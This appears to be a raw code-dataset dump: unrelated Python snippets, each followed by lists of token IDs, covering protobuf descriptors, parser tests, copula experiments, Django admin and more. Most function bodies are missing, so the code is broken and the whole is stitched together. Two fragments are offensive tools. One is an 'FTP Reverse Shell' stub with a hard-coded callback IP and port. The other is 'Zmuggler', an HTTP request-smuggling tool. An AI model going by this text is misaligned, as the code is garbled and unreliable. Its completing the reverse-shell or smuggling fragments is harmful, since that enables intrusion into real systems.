DESCRIPTOR.message_types_by_name['SocialFeedItemUnserializedMessage'] = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE DESCRIPTOR.message_types_by_name['SocialWallCommentMessage'] = _SOCIALWALLCOMMENTMESSAGE DESCRIPTOR.message_types_by_name['SocialGetWallCommentsMessage'] = _SOCIALGETWALLCOMMENTSMESSAGE DESCRIPTOR.message_types_by_name['SocialPostWallCommentMessage'] = _SOCIALPOSTWALLCOMMENTMESSAGE DESCRIPTOR.message_types_by_name['SocialDeleteWallCommentMessage'] = _SOCIALDELETEWALLCOMMENTMESSAGE DESCRIPTOR.message_types_by_name['SocialRequestFeedWallMessage'] = _SOCIALREQUESTFEEDWALLMESSAGE DESCRIPTOR.message_types_by_name['SocialRequestFollowersMessage'] = _SOCIALREQUESTFOLLOWERSMESSAGE DESCRIPTOR.message_types_by_name['SocialRequestIgnoreListMessage'] = _SOCIALREQUESTIGNORELISTMESSAGE DESCRIPTOR.message_types_by_name['SocialGetPlayerInfoListMessage'] = _SOCIALGETPLAYERINFOLISTMESSAGE DESCRIPTOR.message_types_by_name['SocialCommentPetitionMessage'] = _SOCIALCOMMENTPETITIONMESSAGE DESCRIPTOR.message_types_by_name['SocialBioPetitionMessage'] = _SOCIALBIOPETITIONMESSAGE DESCRIPTOR.message_types_by_name['SocialFeedRemovalMessage'] = _SOCIALFEEDREMOVALMESSAGE DESCRIPTOR.message_types_by_name['SocialControlMessage'] = _SOCIALCONTROLMESSAGE DESCRIPTOR.message_types_by_name['SocialInvalidateMsg'] = _SOCIALINVALIDATEMSG DESCRIPTOR.message_types_by_name['SocialControlQueueBroadcastMessage'] = _SOCIALCONTROLQUEUEBROADCASTMESSAGE DESCRIPTOR.message_types_by_name['LifeEventMessage'] = _LIFEEVENTMESSAGE DESCRIPTOR.message_types_by_name['SocialFacebookEventMessage'] = _SOCIALFACEBOOKEVENTMESSAGE DESCRIPTOR.message_types_by_name['SocialCandidateStatisticSubmessage'] = _SOCIALCANDIDATESTATISTICSUBMESSAGE DESCRIPTOR.message_types_by_name['SocialCandidatesMessage'] = _SOCIALCANDIDATESMESSAGE DESCRIPTOR.message_types_by_name['SocialEvaluationResultsMessage'] = _SOCIALEVALUATIONRESULTSMESSAGE DESCRIPTOR.message_types_by_name['SocialCGDigestMessage'] = _SOCIALCGDIGESTMESSAGE
[ 2, 34318, 2349, 21, 2196, 513, 13, 22, 13, 19, 198, 2, 11361, 18022, 8189, 513, 13, 22, 357, 2091, 5824, 8, 198, 2, 4280, 3361, 3902, 422, 25, 11361, 513, 13, 22, 13, 24, 357, 31499, 14, 85, 18, 13, 22, 13, 24, 25, 1485, 66,...
2.38918
39,316
__all__ = ["NumpyUtility"] from .NumpyUtility import *
[ 834, 439, 834, 796, 14631, 45, 32152, 18274, 879, 8973, 198, 198, 6738, 764, 45, 32152, 18274, 879, 1330, 1635, 198 ]
2.666667
21
import sweetviz import pandas as pd if __name__ == '__main__': df = pd.read_csv("BankChurners_clean.csv") report = sweetviz.analyze(df, "Attrition_Flag") report.show_html()
[ 11748, 6029, 85, 528, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 361, 11593, 3672, 834, 220, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 47764, 796, 279, 67, 13, 961, 62, 40664, 7203, 28650, 1925, 700, 364, 62, 27773...
2.410256
78
from pyftpdlib.authorizers import DummyAuthorizer from pyftpdlib.handlers import FTPHandler from multiprocessing import Process from pyftpdlib import servers from time import sleep from requests import get import socket import psutil import win32api # Al0nnso - 2019 # FTP Reverse Shell # NOT TESTED WITH EXTERN NETWORK try: ip = get('https://api.ipify.org').text except: ip='ERROR' pass ftp=None server = None disk = "\\" address = ("0.0.0.0", 21) user = None host = '192.168.15.5'# YOUR IP OR HOST port = 443 if __name__ == '__main__': socketConn(ftp)
[ 6738, 12972, 701, 30094, 8019, 13, 9800, 11341, 1330, 360, 13513, 13838, 7509, 198, 6738, 12972, 701, 30094, 8019, 13, 4993, 8116, 1330, 45854, 25060, 198, 6738, 18540, 305, 919, 278, 1330, 10854, 198, 6738, 12972, 701, 30094, 8019, 1330,...
2.827586
203
#!/usr/bin/env python3 # coding: utf-8 import os import pytest from deep_reference_parser.io.io import ( read_jsonl, write_jsonl, load_tsv, write_tsv, _split_list_by_linebreaks, _unpack, ) from deep_reference_parser.reference_utils import yield_token_label_pairs from .common import TEST_JSONL, TEST_TSV_TRAIN, TEST_TSV_PREDICT, TEST_LOAD_TSV def test_load_tsv_train(): """ Text of TEST_TSV_TRAIN: ``` the i-r focus i-r in i-r Daloa i-r , i-r Cte i-r dIvoire]. i-r Bulletin i-r de i-r la i-r Socit i-r de i-r Pathologie i-r Exotique i-r et i-r ``` """ expected = ( ( ("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."), ("Bulletin", "de", "la", "Socit", "de", "Pathologie"), ("Exotique", "et"), ), ( ("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"), ("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"), ("i-r", "i-r"), ), ) actual = load_tsv(TEST_TSV_TRAIN) assert len(actual[0][0]) == len(expected[0][0]) assert len(actual[0][1]) == len(expected[0][1]) assert len(actual[0][2]) == len(expected[0][2]) assert len(actual[1][0]) == len(expected[1][0]) assert len(actual[1][1]) == len(expected[1][1]) assert len(actual[1][2]) == len(expected[1][2]) assert actual == expected def test_load_tsv_predict(): """ Text of TEST_TSV_PREDICT: ``` the focus in Daloa , Cte dIvoire]. Bulletin de la Socit de Pathologie Exotique et ``` """ expected = ( ( ("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."), ("Bulletin", "de", "la", "Socit", "de", "Pathologie"), ("Exotique", "et"), ), ) actual = load_tsv(TEST_TSV_PREDICT) assert actual == expected def test_load_tsv_train_multiple_labels(): """ Text of TEST_TSV_TRAIN: ``` the i-r a focus i-r a in i-r a Daloa i-r a , i-r a Cte i-r a dIvoire]. 
i-r a Bulletin i-r a de i-r a la i-r a Socit i-r a de i-r a Pathologie i-r a Exotique i-r a et i-r a token ``` """ expected = ( ( ("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."), ("Bulletin", "de", "la", "Socit", "de", "Pathologie"), ("Exotique", "et"), ), ( ("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"), ("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"), ("i-r", "i-r"), ), ( ("a", "a", "a", "a", "a", "a", "a"), ("a", "a", "a", "a", "a", "a"), ("a", "a"), ), ) actual = load_tsv(TEST_LOAD_TSV) assert actual == expected
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 19617, 25, 3384, 69, 12, 23, 198, 198, 11748, 28686, 198, 198, 11748, 12972, 9288, 198, 198, 6738, 2769, 62, 35790, 62, 48610, 13, 952, 13, 952, 1330, 357, 198, 220, 220, 22...
1.644327
1,895
import json import responses
[ 11748, 33918, 198, 198, 11748, 9109, 628 ]
4.428571
7
# ___________________________________________________________________________ # # Prescient # Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC # (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S. # Government retains certain rights in this software. # This software is distributed under the Revised BSD License. # ___________________________________________________________________________ from timer import Timer,tic,toc import unittest from copula import GaussianCopula,FrankCopula,GumbelCopula,ClaytonCopula,StudentCopula, WeightedCombinedCopula import numpy as np import scipy import scipy.integrate as spi import scipy.special as sps import scipy.stats as spst from base_distribution import BaseDistribution,MultiDistr from distributions import UnivariateEmpiricalDistribution, UnivariateEpiSplineDistribution from distributions import UnivariateNormalDistribution,MultiNormalDistribution,UnivariateStudentDistribution, MultiStudentDistribution from vine import CVineCopula,DVineCopula import matplotlib.pyplot as plt import copula_experiments from copula_experiments.copula_diagonal import diag from copula_experiments.copula_evaluate import RankHistogram,emd_sort,emd_pyomo from distribution_factory import distribution_factory def initialize(dim=2,precision = None,copula_string='independence-copula'): if dim==1: mymean = 0 myvar = 2 dimkeys = ["solar"] data_array = np.random.multivariate_normal([mymean], [[myvar]], 1000) dictin = {"solar": data_array[:, 0]} distr_class = distribution_factory(copula_string) mydistr = distr_class(dimkeys, dictin) return mydistr if dim==2: # For some tests, gaussian and student are less precised so we change so precision asked : dimkeys = ["solar", "wind"] ourmean = [3, 4] rho=0.5 ourcov = [[1, rho], [rho, 1]] data_array = np.random.multivariate_normal(ourmean, ourcov, 1000) dictin = dict.fromkeys(dimkeys) for i in range(dim): dictin[dimkeys[i]] = data_array[:, i] valuedict = {"solar": 0.14, "wind": 
0.49} distr_class = distribution_factory(copula_string) mydistr = distr_class(dimkeys, dictin) return mydistr if dim==3: dimkeys = ["solar", "wind", "tide"] dimension = len(dimkeys) # dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)} ourmean = [0, 0, 0] rho01 = 0.1 rho02 = 0.3 rho12 = 0 ourcov = [[1, rho01, rho02], [rho01, 2, rho12], [rho02, rho12, 3]] marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]), "wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]), "tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])} data_array = np.random.multivariate_normal(ourmean, ourcov, 1000) dictin = dict.fromkeys(dimkeys) for i in range(dimension): dictin[dimkeys[i]] = data_array[:, i] distr_class = distribution_factory(copula_string) mydistr = distr_class(dimkeys, dictin) return mydistr if __name__ == '__main__': i=0 for distr in ['empirical-copula']: CopulaTester().test_plot(distr) i=+1 print(i)
[ 2, 220, 220, 27193, 2602, 17569, 198, 2, 198, 2, 220, 1763, 3456, 198, 2, 220, 15069, 12131, 2351, 8987, 1222, 14044, 23555, 286, 3837, 544, 11, 11419, 198, 2, 220, 357, 11251, 7597, 737, 4698, 262, 2846, 286, 17453, 5550, 12, 4535,...
2.51663
1,353
from django.contrib import admin from inbound.models import Rule, InboundIP # Register your models here. admin.site.register(Rule, RuleAdmin)
[ 6738, 42625, 14208, 13, 3642, 822, 1330, 13169, 198, 6738, 287, 7784, 13, 27530, 1330, 14330, 11, 554, 7784, 4061, 198, 198, 2, 17296, 534, 4981, 994, 13, 628, 628, 198, 28482, 13, 15654, 13, 30238, 7, 31929, 11, 14330, 46787, 8, 19...
3.418605
43
from django import forms
[ 6738, 42625, 14208, 1330, 5107, 198 ]
4.166667
6
from collections import Counter if __name__ == '__main__': #print(solution("FRANCE", "french")) print(solution("E=M*C^2", "e=m*c^2"))
[ 6738, 17268, 1330, 15034, 628, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 1303, 4798, 7, 82, 2122, 7203, 10913, 19240, 1600, 366, 69, 3532, 48774, 198, 220, 220, 220, 3601, 7, 82, 2122, 7203, ...
2.423729
59
#!/bin/env python # Copyright STIFTELSEN SINTEF 2016 import suds import urllib2 import sys if len(sys.argv) < 4: print ("Usage:") print ("\t %s gss-url outputfilename token" % sys.argv[0]) exit() # get url: url = sys.argv[1] outputfileName = sys.argv[2] sessionToken = sys.argv[3] wsdlLocation = "https://api.caxman.eu/sintef/infrastructure/gss-0.1/FileUtilities?wsdl" client = suds.client.Client(wsdlLocation) resourceInformation = client.service.getResourceInformation(url, sessionToken) readDescription = resourceInformation.readDescription if readDescription.supported: headers = {} headers[readDescription.sessionTokenField] = sessionToken if hasattr(readDescription, "headers"): for headerField in readDescription.headers: headers[headerField.key] = headerField.value with open(outputfileName, "wb") as outputFile: request = urllib2.Request(url = readDescription.url, headers=headers) result = urllib2.urlopen(request) while True: buffer = result.read() if not buffer: break outputFile.write(buffer) else: print "The given gss_url does not support read/download."
[ 2, 48443, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 3563, 32297, 37142, 1677, 311, 1268, 9328, 37, 1584, 198, 198, 11748, 424, 9310, 198, 11748, 2956, 297, 571, 17, 198, 11748, 25064, 198, 361, 18896, 7, 17597, 13, 853, 85, 8, 127...
2.543568
482
#!/usr/bin/python3 from requests import Request, Session from requests.exceptions import ReadTimeout import urllib3, requests, collections, http.client, optparse, sys, os print("""\033[1;36m _____ _ |__ /_ __ ___ _ _ __ _ __ _| | ___ _ __ / /| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__| / /_| | | | | | |_| | (_| | (_| | | __/ | /____|_| |_| |_|\__,_|\__, |\__, |_|\___|_| |___/ |___/ | Zmuggler | | @electronicbots | \033[1;m""") http.client._header_name = lambda x: True http.client._header_value = lambda x: False urllib3.disable_warnings() if __name__ == '__main__': arguments = Args() if '--target' in str(sys.argv): target = (arguments.link) hrs = ZSmuggler(target) hrs.expl0it() else: print("Try ./Zmuggler.py --help")
[ 2, 48443, 14629, 14, 8800, 14, 29412, 18, 198, 6738, 7007, 1330, 19390, 11, 23575, 198, 6738, 7007, 13, 1069, 11755, 1330, 4149, 48031, 198, 11748, 2956, 297, 571, 18, 11, 7007, 11, 17268, 11, 2638, 13, 16366, 11, 2172, 29572, 11, 2...
1.837838
518
#coding: utf-8 #import cl_to_xi_full from __future__ import print_function from builtins import range import numpy as np from cosmosis.datablock import option_section, names as section_names from cl_to_xi import save_xi_00_02, save_xi_22, arcmin_to_radians, SpectrumInterp from legendre import get_legfactors_00, get_legfactors_02, precomp_GpGm
[ 2, 66, 7656, 25, 3384, 69, 12, 23, 198, 2, 11748, 537, 62, 1462, 62, 29992, 62, 12853, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 6738, 3170, 1040, 1330, 2837, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 8615, 76, ...
2.876033
121
""" The ``video`` taxon groups applets implementing video interfaces, that is, interfaces for periodic transfers of 2d arrays of samples of electromagnetic wave properties. Examples: VGA output, TFT LCD capture, TFT LCD output. Counterexamples: SCSI scanner (use taxon ``photo``), SPI LCD output (use taxon ``display``). """
[ 37811, 198, 464, 7559, 15588, 15506, 1687, 261, 2628, 598, 5289, 15427, 2008, 20314, 11, 326, 318, 11, 20314, 329, 27458, 198, 7645, 69, 364, 286, 362, 67, 26515, 286, 8405, 286, 31094, 6769, 6608, 13, 198, 198, 27730, 25, 569, 9273, ...
3.835294
85
""" The vasprun.xml parser interface. --------------------------------- Contains the parsing interfaces to ``parsevasp`` used to parse ``vasprun.xml`` content. """ # pylint: disable=abstract-method, too-many-public-methods import numpy as np from parsevasp.vasprun import Xml from parsevasp import constants as parsevaspct from aiida_vasp.parsers.content_parsers.base import BaseFileParser from aiida_vasp.utils.compare_bands import get_band_properties def _build_structure(lattice): """Builds a structure according to AiiDA spec.""" structure_dict = {} structure_dict['unitcell'] = lattice['unitcell'] structure_dict['sites'] = [] # AiiDA wants the species as symbols, so invert elements = _invert_dict(parsevaspct.elements) for pos, specie in zip(lattice['positions'], lattice['species']): site = {} site['position'] = np.dot(pos, lattice['unitcell']) site['symbol'] = elements[specie].title() site['kind_name'] = elements[specie].title() structure_dict['sites'].append(site) return structure_dict def _invert_dict(dct): return dct.__class__(map(reversed, dct.items()))
[ 37811, 198, 464, 34439, 1050, 403, 13, 19875, 30751, 7071, 13, 198, 198, 3880, 12, 198, 4264, 1299, 262, 32096, 20314, 284, 7559, 29572, 85, 5126, 15506, 973, 284, 21136, 7559, 11017, 1050, 403, 13, 19875, 15506, 2695, 13, 198, 37811, ...
2.787952
415
from django.contrib import admin from .models import Produto, TipoProduto, Estoque # Register your models here. admin.site.register(TipoProduto, TipoProdutoAdmin) admin.site.register(Estoque, EstoqueAdmin) admin.site.register(Produto, ProdutoAdmin)
[ 6738, 42625, 14208, 13, 3642, 822, 1330, 13169, 198, 6738, 764, 27530, 1330, 1041, 67, 9390, 11, 23095, 78, 2964, 67, 9390, 11, 10062, 78, 4188, 198, 198, 2, 17296, 534, 4981, 994, 13, 198, 28482, 13, 15654, 13, 30238, 7, 28434, 78,...
2.852273
88
import gd, itertools from cube import calculate_cube from ball import calculate_ball from helpers import average client = gd.Client() modes = {gd.PortalType.CUBE: calculate_cube, gd.PortalType.SHIP: calculate_ship, gd.PortalType.BALL: calculate_ball, gd.PortalType.BALL: calculate_ufo, gd.PortalType.UFO: calculate_ufo, gd.PortalType.WAVE: calculate_wave, gd.PortalType.ROBOT: calculate_robot, gd.PortalType.SPIDER: calculate_spider, gd.Gamemode.CUBE: calculate_cube, gd.Gamemode.SHIP: calculate_ship, gd.Gamemode.BALL: calculate_ball, gd.Gamemode.BALL: calculate_ufo, gd.Gamemode.UFO: calculate_ufo, gd.Gamemode.WAVE: calculate_wave, gd.Gamemode.ROBOT: calculate_robot, gd.Gamemode.SPIDER: calculate_spider} if __name__ == "__main__": star = main() print(star)
[ 11748, 308, 67, 11, 340, 861, 10141, 198, 6738, 23441, 1330, 15284, 62, 40296, 198, 6738, 2613, 1330, 15284, 62, 1894, 198, 6738, 49385, 1330, 2811, 198, 198, 16366, 796, 308, 67, 13, 11792, 3419, 198, 198, 76, 4147, 796, 1391, 21287,...
2.112676
426
from collections import defaultdict c=defaultdict(set) f=lambda:[int(i) for i in input().split()] a,b=f() s,e=f() for i in range(s,e+1): x=i%a==0 y=i%b==0 if x and y: c[3].add(i) elif x and not y: c[1].add(i) elif y and not x: c[2].add(i) else: c[4].add(i) o=[] for i in range(1,5): o.append(str(len(c[i]))) print(' '.join(o))
[ 6738, 17268, 1330, 4277, 11600, 198, 66, 28, 12286, 11600, 7, 2617, 8, 198, 69, 28, 50033, 33250, 600, 7, 72, 8, 329, 1312, 287, 5128, 22446, 35312, 3419, 60, 198, 64, 11, 65, 28, 69, 3419, 198, 82, 11, 68, 28, 69, 3419, 198, ...
1.971098
173
"""Module with useful exceptions for Parser."""
[ 37811, 26796, 351, 4465, 13269, 329, 23042, 263, 526, 15931, 628, 628, 198 ]
4
13
import json import next.utils as utils from next.apps.AppDashboard import AppDashboard
[ 11748, 33918, 198, 11748, 1306, 13, 26791, 355, 3384, 4487, 198, 6738, 1306, 13, 18211, 13, 4677, 43041, 3526, 1330, 2034, 43041, 3526, 628, 198 ]
3.56
25
import os import compas from compas.datastructures import Mesh HERE = os.path.dirname(__file__) DATA = os.path.join(HERE, 'data') FILE = os.path.join(DATA, 'faces.obj') mesh = Mesh.from_obj(FILE) print(mesh.summary())
[ 11748, 28686, 198, 11748, 552, 292, 198, 6738, 552, 292, 13, 19608, 459, 1356, 942, 1330, 47529, 198, 198, 39, 9338, 796, 28686, 13, 6978, 13, 15908, 3672, 7, 834, 7753, 834, 8, 198, 26947, 796, 28686, 13, 6978, 13, 22179, 7, 39, ...
2.54023
87
#!/usr/bin/env python # # Copyright 2019 DFKI GmbH. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the # following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN # NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE # USE OR OTHER DEALINGS IN THE SOFTWARE. from PySignal import Signal from .animation_controller import AnimationController from ..scene.components import ComponentBase
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 198, 2, 15069, 13130, 360, 26236, 40, 402, 2022, 39, 13, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 3877, 11, 284, 597, 1048, 16727, 257, 198, 2, 4866, 286, ...
3.832817
323